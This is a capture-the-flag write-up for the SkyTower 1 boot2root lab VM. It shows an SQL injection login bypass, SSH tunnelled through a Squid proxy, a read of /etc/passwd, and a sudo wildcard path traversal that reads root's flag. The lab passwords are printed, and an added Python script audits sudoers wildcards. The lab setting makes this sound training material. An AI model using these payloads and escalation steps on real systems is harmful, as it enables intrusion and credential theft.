Skytower 1 boot2root

URL: http://vulnhub.com/entry/skytower-1,96/

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-28 23:18 EEST  
Nmap scan report for 192.168.74.134  
Host is up (0.00075s latency).  
Not shown: 997 closed ports  
PORT     STATE    SERVICE  
22/tcp   filtered ssh  
80/tcp   open     http  
3128/tcp open     squid-http  

Let's examine port 80:

(screenshot: skytower)

SQL injection?

Let's try to find out:

Post request:

email=&password='  

Result:

There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]  

Post data of the malicious request:

email='*'&password='*'  

(screenshot: sql_injection)

For security reasons, you must login to the SkyTech server via SSH to access the account details.

Username: john  
Email: [email protected]  
Password: hereisjohn  

The SSH port is filtered and Squid is installed on the server. I added the following two lines to my ~/.ssh/config file:

Host 192.168.74.134  
  ProxyCommand corkscrew 192.168.74.134 3128 %h %p

So I am using corkscrew to tunnel the SSH connection through the Squid proxy.

Logging in:

ssh [email protected]

Response:

Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;  
the exact distribution terms for each program are described in the  
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent  
permitted by applicable law.  
Last login: Sat Jun 28 17:18:32 2014 from 192.168.74.134

Funds have been withdrawn  
Connection to 192.168.74.134 closed.  

The login itself succeeds, but the session is closed before I get the chance to execute a command. Then I tried:

ssh [email protected] "cat /etc/passwd"

I found two more users in the passwd file:

john:x:1000:1000:john,,,:/home/john:/bin/bash  
sara:x:1001:1001:,,,:/home/sara:/bin/bash  
william:x:1002:1002:,,,:/home/william:/bin/bash  

Now that I know the company's email format ([email protected]), I can try the other usernames in the first form.

Post request:

[email protected]&password='*'  

Username: sara
Password: ihatethisjob

Post request:

[email protected]&password='*'  

Username: william
Password: senseable

In order to get a shell, I need to move aside the .bashrc file that closes the connection.

ssh [email protected] "mv /home/sara/.bashrc /home/sara/.bashrc_backup"  

After logging in, I typed sudo -l:

sudo -l  
Matching Defaults entries for sara on this host:  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:  
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The use of asterisks in the sudoers file is dangerous, as seen here: the wildcard also matches `../`, so the command is not actually confined to /accounts/.

sudo ls /accounts/../root/  
flag.txt
sudo cat /accounts/../root/flag.txt  
Congratz, have a cold one to celebrate!  
root password is theskytower  
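As an added example (not part of the original writeup), here is a small Python audit that reproduces sudo's argument matching to flag sudoers entries like the one above: sudo compares the argument string with fnmatch(3) and no FNM_PATHNAME flag, so `*` also matches `/` and therefore `..` components. The parse simplifications and the probe path built from the pattern are my assumptions.

```python
import fnmatch
import re

# The command list reported by `sudo -l` in the writeup (constructed copy of that line).
SUDO_L_COMMANDS = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"


def parse_cmnd_specs(cmnd_list):
    """Split a sudoers Cmnd_Spec list into (command, argument_pattern) pairs.

    Simplification (assumption): runas groups "(user)" and the NOPASSWD/PASSWD
    tags are dropped, and commas inside arguments are not handled.
    """
    pairs = []
    for spec in cmnd_list.split(","):
        spec = re.sub(r"\([^)]*\)|NOPASSWD:|PASSWD:", "", spec).strip()
        if not spec:
            continue
        parts = spec.split(None, 1)
        pairs.append((parts[0], parts[1] if len(parts) > 1 else ""))
    return pairs


def sudo_args_match(pattern, user_args):
    """Mirror sudo's argument check: fnmatch(3) without FNM_PATHNAME,
    so '*' also matches '/' and hence '..' path components."""
    return fnmatch.fnmatchcase(user_args, pattern)


def audit_wildcards(cmnd_list):
    """Return (command, pattern, escaping_argument) for every argument
    pattern whose wildcard accepts a path that climbs out of its directory."""
    findings = []
    for cmd, pattern in parse_cmnd_specs(cmnd_list):
        if "*" not in pattern:
            continue
        # Probe: keep the fixed prefix of the pattern and append a parent-directory
        # step towards the file read in the writeup (hypothetical probe, for the audit only).
        probe = pattern.split("*", 1)[0] + "../root/flag.txt"
        if sudo_args_match(pattern, probe):
            findings.append((cmd, pattern, probe))
    return findings


if __name__ == "__main__":
    for cmd, pattern, probe in audit_wildcards(SUDO_L_COMMANDS):
        print(f"{cmd} {pattern!r} also permits: sudo {cmd} {probe}")
```

No `*` pattern can exclude `..`, so the fix is to list the permitted files explicitly or to grant a wrapper script that canonicalises the path before acting on it.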

And we are root! It was an entry-level boot2root, but it had some unique 'features' like the use of Squid.

MySQL credentials as a bonus:

cat /var/www/login.php | grep mysql  
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');